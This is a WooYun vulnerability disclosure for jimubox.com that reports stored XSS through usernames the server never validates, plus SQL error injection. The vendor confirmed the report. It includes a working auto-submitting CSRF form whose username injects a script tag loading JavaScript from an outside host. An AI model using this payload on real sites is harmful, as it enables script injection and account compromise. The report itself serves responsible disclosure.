积木盒子三处漏洞集合（可查询SQL语句）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0116773

漏洞标题：积木盒子三处漏洞集合（可查询SQL语句）

漏洞作者： q601333824

提交时间：2015-05-28 17:59

修复时间：2015-07-12 22:54

公开时间：2015-07-12 22:54

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-28：细节已通知厂商并且等待厂商处理中
2015-05-28：厂商已经确认，细节仅向厂商公开
2015-06-07：细节向核心白帽子及相关领域专家公开
2015-06-17：细节向普通白帽子公开
2015-06-27：细节向实习白帽子公开
2015-07-12：细节向公众公开

简要描述：

积木盒子三处小漏洞集合

详细说明：

1.这个漏洞用到的是第三方帐号，我用第三方帐号登录，到达这个页面

2.停在这个页面不要动，从上面图上，看出来，用户名注册，不能使用符号，但是这里只进行了本地验证用户名格式，服务器没有验证，post提交就行，可以注册一个XSS用户名

①。先用第三方帐号登录，停在那个页面不要动，访问下面这段下面

②.

<html>
<form id="csrf" name="csrf" action="https://www.jimubox.com/oauth/register" method="POST">
<input type="text" id="haha" name="UserName" value="XXXXXXXX" />
<input type="text" name="password" value="a456a456" />
</form>
<script>
       var shuzu=['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F','G','H','I','J','K','L','a','b','c','d','e','f','g']; 
       function test(){
                      var uid="";
                       for(var i=0;i<=15;i++)
                                  {        
                                  var tbs=Math.floor(Math.random()*29);
                                  uid=uid+shuzu[tbs]; 
                                  }                
                 return(uid);
                }
       var UserName=document.getElementById("haha");
       UserName.value=test()+"<script/src='//fripside.sinaapp.com/jimuhezi.js'>"
       setTimeout("document.csrf.submit();",2000);
</script>
</body>
</html>

3.如图. 名字的地方的被插入XSS.

------------------------------------------------------------------------------------------------
4.两种SQL报错
①.更新数据

②.插入数据

-------------------------------------------------------------------------------------------
5.论坛名字的地方，只进行本地验证，服务器没有验证，导致注册的名字可以插入XSS

漏洞证明：

1.漏洞证明看上面
2.①.更新数据

②.插入数据

修复方案：

1.服务器验证下名字格式
2.配置不当,当参数过长，会导致SQL报错

3.只证明漏洞存在

版权声明：转载请注明来源 q601333824@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-05-28 18:10

厂商回复：

感谢您的关注，我们将马上进行修复！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0116773

漏洞标题：积木盒子三处漏洞集合（可查询SQL语句）

相关厂商：jimubox.com

漏洞作者： q601333824

提交时间：2015-05-28 17:59

修复时间：2015-07-12 22:54

公开时间：2015-07-12 22:54

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 q601333824@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0116773

漏洞标题：积木盒子三处漏洞集合（可查询SQL语句）

相关厂商：jimubox.com

漏洞作者： q601333824

提交时间：2015-05-28 17:59

修复时间：2015-07-12 22:54

公开时间：2015-07-12 22:54

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：5

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0116773"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 q601333824@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：